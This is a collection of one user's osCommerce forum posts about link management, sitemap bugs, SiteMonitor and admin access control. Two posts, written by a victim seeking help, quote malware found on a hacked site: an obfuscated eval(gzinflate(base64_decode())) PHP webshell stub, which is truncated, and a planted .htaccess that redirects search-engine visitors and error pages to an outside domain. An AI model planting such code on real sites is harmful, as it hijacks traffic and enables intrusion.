mr_absinthe

I tested on a various links with various statuses. Tested in FF as well as IE and Chrome. It appears that it only works on some links - I have not been able to figure out when and why. For example I've selected three links with status Approved and changed them in IE to Disabled. Only two of them were changed. The link that did not changed is unchangable - tested all browsers and all statuses - remains Approved. Another link has status Disabled and in IE did not change to Approved nor changed to Pending in FF - nor I was able to delete it in Chrome. I hope that helps.

Real, Absinth, Thujone, originalabsinthe, www.originalabsinthe.com and that might explain it... I took out Real and it works now. Somehow I forgot that I've put more phrazes there. The second noticed problem is with the page Links Status - I am now unable to change the status using the buttons located at the bottom of the page (Pending, Approved, Disabled, etc.) It does nothing. I've loaded the admin/includes/functions/links.php file from the previous version (1.28) to test it and it works fine. Any ideas?

Hi Jack, thank you for keep updating. I might be doing something wrong or I just don't get it... perhaps you could clarify it for me. I have a pending link submission and as you can see from this image, my link should be located on their web site: When I check the link, it is found: And the Links Status page clearly shows that everything is OK and my link is there: I have not been able to find the link there no matter how hard I try, can you see it there somewhere? If not, why is the script returning positive result?

Thank you Nic, maybe I was going too quick through the install file... It is clear now :thumbsup:

If I understand correctly (when I look into robots.txt), we should create folder /admin/ and copy the index.php from personal folder there, right? But that would mean that two "banned" emails will be received - at least that is what is happening right now. And if I don't keep the index.php file in admin folder, nobody is trapped while trying to access it.

Jack, are you sure that the newly posted link is correct? I believe that you wanted to mention this one instead: http://addons.oscommerce.com/info/6583

Thank you, those fixes have been applied BEFORE the attack.

They've uploaded .php files to writable directories only. File manager does not exist there and admin was also renamed. Not sure what patch in application_top you mean, could you point me please?

Jack, just wanted to say THANKS! I've installed the SiteMonitor on a friend's site and it discovered hacker files recently! They've uploaded several files to all writable directories of the web site. It seems that files have identical content and various filenames such as spill.php, spool.php or sql.php. This is a small preview of those files: <? eval(gzinflate(base64_decode('DZfHDsTGEUR/xTdJ4IE5wZYFcplzWqaLwZxz5td7D32c6cGg6nX1P//9zz//Ks6k/7N6m7Hsk734M022gsD+lxfZlBd//sHFBbptAZN9DfCOkS7KBD2csD3B6/cdLurl+rFc4fJ0A4YBbhA8818ZJR5/TZB4wHxZRPrTgkPik27AgT7u4aHigaBc2AKjQjPqHcddIBNTflVwsk2pp9LyFS9gGVHI8aNw1G/2SapZF6qaUqu14drNMKrjEGXi3KZgERz+/CachCmy5fu6LnTT8qnvdnZr/OJR/ZGcJH6PPJRVn/Lqpph4bjI70sbJWuZJYFcLr5iDoN9IMSDwAVKL3qh2z2hsSxeVYuywg/weFvlFGp16ItXYntOIHOyIDc2RgFZyDKJUfU8ZDSu86FUYRX7T/KFdm73bC7LWl5alFhS8Pgq3FEBkGwrnaQqmeE014izZSQ0pLx6U5KkpyXEN9Q4R... etc. etc. Thanks to SiteMonitor, we've noticed quite quickly and deleted those files and added .htaccess with this code: php_flag engine off <Files ~ "\.(php*|s?p?html|cgi|pl|ini)$"> deny from all </Files> We've also changed CHMOD to 757 because 775 was throwing errors. Few minutes after changing the permissions, I've noticed that new .htaccess files were uploaded to all of those directories so I've deleted them. Setting permissions to 757 is obviously no solution and I have also changed the ftp password - however there was no hacker trace in the ftp log. Would you have a solution how to avoid the above please? Is there a possibility of protecting writable directories? As far as I can tell, files have been patched and many security contributions are in place.

And for those facing the same warning... Just make sure that the directory data (/includes/modules/kiss_filesafe/data) is writable. P.S. The correct answer was just two words longer, that should not hurt Rob! Have you ever not overlooked something by yourself?

After browsing to filesafe.php these errors appeared: Warning: Kiss_FileSafe_Abstract::moduleAccess cannot write to the module directory [PATH]includes/modules/kiss_filesafe/data, this will have to be done manually in /home/xxx/public_html/includes/modules/kiss_filesafe/classes/kiss_filesafe_abstract.php on line 186 Warning: file_put_contents(/home/xxx/public_html/includes/modules/kiss_filesafe/data/files_data.txt) [function.file-put-contents]: failed to open stream: Permission denied in /home/xxx/public_html/includes/modules/kiss_filesafe/classes/kiss_filesafe_abstract.php on line 251 Warning: file_put_contents(/home/xxx/public_html/includes/modules/kiss_filesafe/data/runtime.txt) [function.file-put-contents]: failed to open stream: Permission denied in /home/xxx/public_html/includes/modules/kiss_filesafe/classes/kiss_filesafe_abstract.php on line 256 Any idea please?

Thank you for another great contribution, I'm just about to install it on friend's web site. May I ask what is the difference between this and SiteMonitor? Also, since you've mentioned extra protection for writable directories, maybe you would have a solution to the following problem: Friend's site was hacked... they've uploaded several files to all writable directories of the web site. It seems that files have identical content and various filenames such as spill.php, spool.php or sql.php. This is a small preview of those files: <? eval(gzinflate(base64_decode('DZfHDsTGEUR/xTdJ4IE5wZYFcplzWqaLwZxz5td7D32c6cGg6nX1P//9zz//Ks6k/7N6m7Hsk734M022gsD+lxfZlBd//sHFBbptAZN9DfCOkS7KBD2csD3B6/cdLurl+rFc4fJ0A4YBbhA8818ZJR5/TZB4wHxZRPrTgkPik27AgT7u4aHigaBc2AKjQjPqHcddIBNTflVwsk2pp9LyFS9gGVHI8aNw1G/2SapZF6qaUqu14drNMKrjEGXi3KZgERz+/CachCmy5fu6LnTT8qnvdnZr/OJR/ZGcJH6PPJRVn/Lqpph4bjI70sbJWuZJYFcLr5iDoN9IMSDwAVKL3qh2z2hsSxeVYuywg/weFvlFGp16ItXYntOIHOyIDc2RgFZyDKJUfU8ZDSu86FUYRX7T/KFdm73bC7LWl5alFhS8Pgq3FEBkGwrnaQqmeE014izZSQ0pLx6U5KkpyXEN9Q4R... etc. etc. We've noticed quite quickly and deleted those files and added .htaccess as per your instructions. We've also changed CHMOD to 757 because 775 was throwing errors. Few minutes after changing the permissions, I've noticed that new .htaccess files were uploaded to all of those directories so I've deleted them. Setting permissions to 757 is obviously no solution and I have also changed the ftp password - however there was no hacker trace in the ftp log. Their .htaccess was: RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*yandex.* [OR] RewriteCond %{HTTP_REFERER} .*rambler.* [OR] RewriteCond %{HTTP_REFERER} .*mail.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* RewriteRule ^(.*)$ http://lincau.osa.pl/se/ [R=301,L] ErrorDocument 401 http://lincau.osa.pl/se/ ErrorDocument 403 http://lincau.osa.pl/se/ ErrorDocument 404 http://lincau.osa.pl/se/ ErrorDocument 500 http://lincau.osa.pl/se/ Would you have a solution to the above please? As far as I can tell, files have bee patched and many security contributions are in place.

OK, no problem. As always, please feel free to let me know if you want me to test it.

OK, the following did not work - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 order by m.manufacturers_name DESC LIMIT 0, 30' at line 1 SELECT m.manufacturers_id as mID, m.date_added, m.last_modified as last_mod, m.manufacturers_name FROM manufacturers m left join manufacturers_info mi on m.manufacturers_id = mi.manufacturers_id where mi.languages_id 1 order by m.manufacturers_name DESC; so I changed it to this (where mi.languages_id = 1) and it worked just fine - Showing rows 0 - 3 (4 total, Query took 0.0006 sec) SELECT m.manufacturers_id as mID, m.date_added, m.last_modified as last_mod, m.manufacturers_name FROM manufacturers m left join manufacturers_info mi on m.manufacturers_id = mi.manufacturers_id where mi.languages_id = 1 order by m.manufacturers_name DESC; So, what does it tell us?

It is still failing I'm afraid... ERROR: Google Manufacturers Sitemap Generation FAILED! this is the code: function GenerateManufacturerSitemap($languages_id){ $sql = "SELECT m.manufacturers_id as mID, m.date_added, m.last_modified as last_mod, m.manufacturers_name FROM " . TABLE_MANUFACTURERS . " m left join " . TABLE_MANUFACTURERS_INFO . " mi on m.manufacturers_id = mi.manufacturers_id where mi.languages_id = " . (int)$language_id . " order by m.manufacturers_name DESC";

It appears that it is failing... ERROR: Google Manufacturers Sitemap Generation FAILED! and: [MANUFACTURERS] => Array ( [sTATUS] => success [NUM_ROWS] => 0 ) I have uploaded an empty sitemapmanufacturers.xml file to a server before testing. All other sitemaps created successfully.

Jack, could you please provide the change for the manufacturers sql query in googlesitemap/sitemap.class.php?

Hi Jack, support thread in admin (language file) shows: http://www.oscommerce.com/forums/topic/351109-compare-my-price/. I'll test and let you know more later.

Thank you very much, that works just fine on both sitemapcategories.xml and sitemapspecials.xml. I see no problem on the products section and I'm not using manufacturers.

That works fine on sitemapspecials.xml however no change on sitemapcategories.xml, still 32 links like: http://www.originalabsinthe.com/accessories-c-23.html http://www.originalabsinthe.com/accessories-c-23.html http://www.originalabsinthe.com/accessories-c-23.html http://www.originalabsinthe.com/accessories-c-23.html http://www.originalabsinthe.com/special-offers-c-24.html http://www.originalabsinthe.com/special-offers-c-24.html http://www.originalabsinthe.com/special-offers-c-24.html http://www.originalabsinthe.com/special-offers-c-24.html http://www.originalabsinthe.com/gift-vouchers-c-27.html http://www.originalabsinthe.com/gift-vouchers-c-27.html http://www.originalabsinthe.com/gift-vouchers-c-27.html http://www.originalabsinthe.com/gift-vouchers-c-27.html

Hi Jack, Thanks for the update, I'm running the latest version, four languages. Problem with multiple language links on sitemapspecials sorted, however same problem is now on categories: sitemapcategories.xml I have total of 8 categories, however sitemapcategories.xml shows four identical (all English language) links for each category, 32 links in total. Looks like sitemap.class.php needs a little change around function GenerateCategorySitemap.

OK, poke me when you do please. ;)

Hi Jack, did you have a chance to have a look at the above issue please?

I'm running version 2.5 in my two stores on two different servers and after a lot of testing, it appears that this version is stable with no major bugs - I therefore suggest updating SiteMonitor to the latest version - it only takes few minutes anyway.

I can see that quite a few people were having similar problem, $PHP_AUTH_USER and _SERVER[REMOTE_USER] didn't work. It was same for me, I have therefore replaced it with _SERVER[REDIRECT_REMOTE_USER]. Also, on some servers, you cannot use DIR_WS_ADMIN, don't ask me why. You will have to keep the file name only. To give you an example, the whole, working piece of code would look like this: if ($_SERVER['REDIRECT_REMOTE_USER']==user1) {; } else { if ( ($PHP_SELF != "orders.php") && ($PHP_SELF != "index.php") && ($PHP_SELF != "invoice.php") && ($PHP_SELF != "server_info.php") ) { die("<br /><br /><br /><br /><center><b>You are not currently authorized to view this page.</b><br /><br />Please contact the store administrator for details. To return, click back on your browser.<br /><br /><br /><br />\n\n <i>If you do need access to a specific page please contact the site administrator and quote the below page name.</i><br><br>Page name: $PHP_SELF</center>"); } } And last but not least, you may need to add index.php in your list of permitted files, otherwise you would need to enter the permitted page via direct link - https://www.yourstore.com/admin/orders.php for example. I hope that helps.